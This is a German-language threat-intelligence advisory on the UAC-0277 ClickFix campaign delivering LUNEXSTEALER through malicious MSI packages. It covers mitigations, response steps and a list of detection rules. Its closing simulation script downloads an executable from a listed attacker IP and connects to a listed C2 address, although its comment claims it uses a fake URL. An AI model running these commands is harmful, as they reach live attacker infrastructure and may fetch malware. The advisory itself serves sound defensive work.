SOC Prime Bias: High

06 Oct 2026 14:30 UTC

UAC-0277-Angriffe liefern LUNEXSTEALER über bösartige MSI und ClickFix

Author Photo
SOC Prime Team linkedin icon Folgen
UAC-0277-Angriffe liefern LUNEXSTEALER über bösartige MSI und ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Bedrohungsakteure, die als UAC-0277 verfolgt werden, kompromittieren legitime Websites, um bösartigen JavaScript einzuschleusen, der Benutzer dazu verleitet, Befehle über eine gefälschte Cloudflare-Verifizierungsseite auszuführen. Diese ClickFix-Technik liefert letztendlich MSI-Pakete, die LUNEXSTEALER oder zusätzliche Loader enthalten, die BYOVD nutzen, um Sicherheitskontrollen zu umgehen. Die Kampagne verwendet auch blockchain-basierte Command-and-Control-Infrastruktur auf Polygon und Ethereum, um Angreiferressourcen dynamisch zu verwalten.

Untersuchung

CERT-UA identifizierte mehr als 100 kompromittierte Websites und analysierte drei mit der Kampagne verbundene MSI-Varianten. Forscher beobachteten DLL-Sideloading unter Verwendung von FnHotkeyUtility.exe und die Ausnutzung des anfälligen AMD-PDFWKRNL.sys-Treibers, um Windows Defender-Schutz zu umgehen. Die Untersuchung enthüllte auch die LUNARAXE-Browsererweiterung und die NAIVEMESS-PowerShell-Komponente, die zur Sammlung und Exfiltration von Daten verwendet wurden.

Eindämmung

Administratoren sollten den Zugriff auf das Ausführen-Dialogfeld (Win+R) über Gruppenrichtlinien einschränken und die MSI-Installationsberechtigungen auf autorisierte Benutzer beschränken. Die Aktivierung der Microsoft-Schwachstellen-Treibersperrliste ist entscheidend, um das Risiko von BYOVD-Angriffen zu verringern. Organisationen sollten auch durchsetzten, dass nur zugelassene Browsererweiterungen verwendet werden, und verdächtige msiexec.exe-Befehlszeilenaktivitäten mit Remote-URLs überwachen.

Antwort

Wenn verdächtige MSI-Ausführungen oder unbefugte Browsererweiterungen entdeckt werden, isolieren Sie den betroffenen Host und beenden Sie alle Prozesse, die mit LUNEXSTEALER in Verbindung stehen. Überprüfen Sie geplante Aufgaben auf Einträge namens psychedelicloveUtils und inspizieren Sie Browserprofile auf die Microsoft Office Word Editor-Erweiterung. Alle identifizierten gefälschten Cloudflare-Verifizierungsseiten, die mit der Kampagne in Verbindung stehen, sollten an CERT-UA gemeldet werden.

Angriffsfluss

Erkennungen

Verdächtiger RunMRU-Eintrag mit LOLBin-Semantik (über registry_event)

SOC Prime Team
05 Okt 2026

Möglicher Versuch der Installation einer Remote-MSI-Datei (über cmdline)

SOC Prime Team
05 Okt 2026

Verdächtige geplante Aufgabe (über Audit)

SOC Prime Team
05 Okt 2026

Verdächtiger Dateidownload direkt über IP (über Proxy)

SOC Prime Team
05 Okt 2026

Verdächtige Befehls- und Kontrollanfrage durch ungewöhnlichen Top-Level-Domain (TLD) DNS-Request (über dns)

SOC Prime Team
05 Okt 2026

IOCs (HashSha256), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware Teil 2

SOC Prime AI-Regeln
06 Okt 2026

IOCs (HashSha256), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware Teil 1

SOC Prime AI-Regeln
06 Okt 2026

IOCs (HashMd5), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware Teil 2

SOC Prime AI-Regeln
06 Okt 2026

IOCs (HashMd5), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware Teil 1

SOC Prime AI-Regeln
06 Okt 2026

IOCs (SourceIP), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware

SOC Prime AI-Regeln
06 Okt 2026

IOCs (DestinationIP), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware

SOC Prime AI-Regeln
06 Okt 2026

Interaktion mit bösartigen C2-Servern über HTTP und WebSocket erkennen [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
06 Okt 2026

FnHotkeyUtility führt bösartige spkvol.dll über DLL-Sideloading aus [Windows Sysmon]

SOC Prime AI-Regeln
06 Okt 2026

Bösartiger MSI-Paket-Download unter Verwendung von Msiexec und Verwundbarkeitsexploit [Windows-Prozesserstellung]

SOC Prime AI-Regeln
06 Okt 2026

Bösartiges JavaScript auf kompromittierten Websites erkennen [Webserver]

SOC Prime AI-Regeln
06 Okt 2026

Simulationsausführung

  • Angriffsablauf & Befehle: Der Angreifer hat erfolgreich eine Drive-by-Kompromittierung durchgeführt. Um Persistenz zu erreichen und die nächste Stufe der Malware herunterzuladen, versucht der eingeführte Agent, eine Datei namens psychedeliclove.exe von einem bestimmten URI abzurufen. Gleichzeitig versucht der Agent, an einen sekundären C2-Knoten zu senden, der sich bei 193.178.159.128 auf dem Port 8080 befindet, um Anweisungen über eine WebSocket-ähnliche HTTP-Verbindung zu erhalten. Diese spezifischen Indikatoren sollen die bestehenden Proxy-basierten Erkennungsregeln auslösen.

  • Regressionstestskript:

    # Simulationsskript zur Erkennungsvalidierung
    # Zweck: Die spezifischen URL- und IP/Port-Indikatoren in der Erkennungsregel auslösen.
    
    Write-Host "[*] Starte Simulation..." -ForegroundColor Cyan
    
    # 1. Trigger Auswahl 1: Bösartiges URL-Muster
    Write-Host "[*] Versuch, auf bösartiges URL-Muster zuzugreifen..." -ForegroundColor Yellow
    try {
        # Wir verwenden einen nicht existierenden lokalen Listener oder eine gefälschte URL, um sicherzustellen, dass wir tatsächlich keine echte bösartige Seite treffen, 
        # aber der Proxy sollte dennoch den Anfragenversuch protokollieren.
        Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue
    } catch {
        Write-Host "[!] Anfrage fehlerhaft (erwartet), aber Telemetrie sollte generiert werden." -ForegroundColor Gray
    }
    
    # 2. Trigger Auswahl 2: Spezifische IP und Port
    Write-Host "[*] Versuch, Verbindung zur C2-IP auf Port 8080 herzustellen..." -ForegroundColor Yellow
    try {
        $client = New-Object System.Net.Sockets.TcpClient
        $client.Connect("193.178.159.128", 8080)
        $client.Close()
    } catch {
        Write-Host "[!] Verbindung fehlerhaft (erwartet), aber Protokollprotokolle sollten den Versuch erfassen." -ForegroundColor Gray
    }
    
    Write-Host "[*] Simulation abgeschlossen." -ForegroundColor Cyan
  • Bereinigungskommandos:

    # Durch diese Simulation werden keine permanenten Dateien erstellt.
    # Es werden nur temporäre Netzwerkverbindungen versucht.
    Write-Host "[*] Bereinigung abgeschlossen. Keine Artefakte auf dem System hinterlassen." -ForegroundColor Green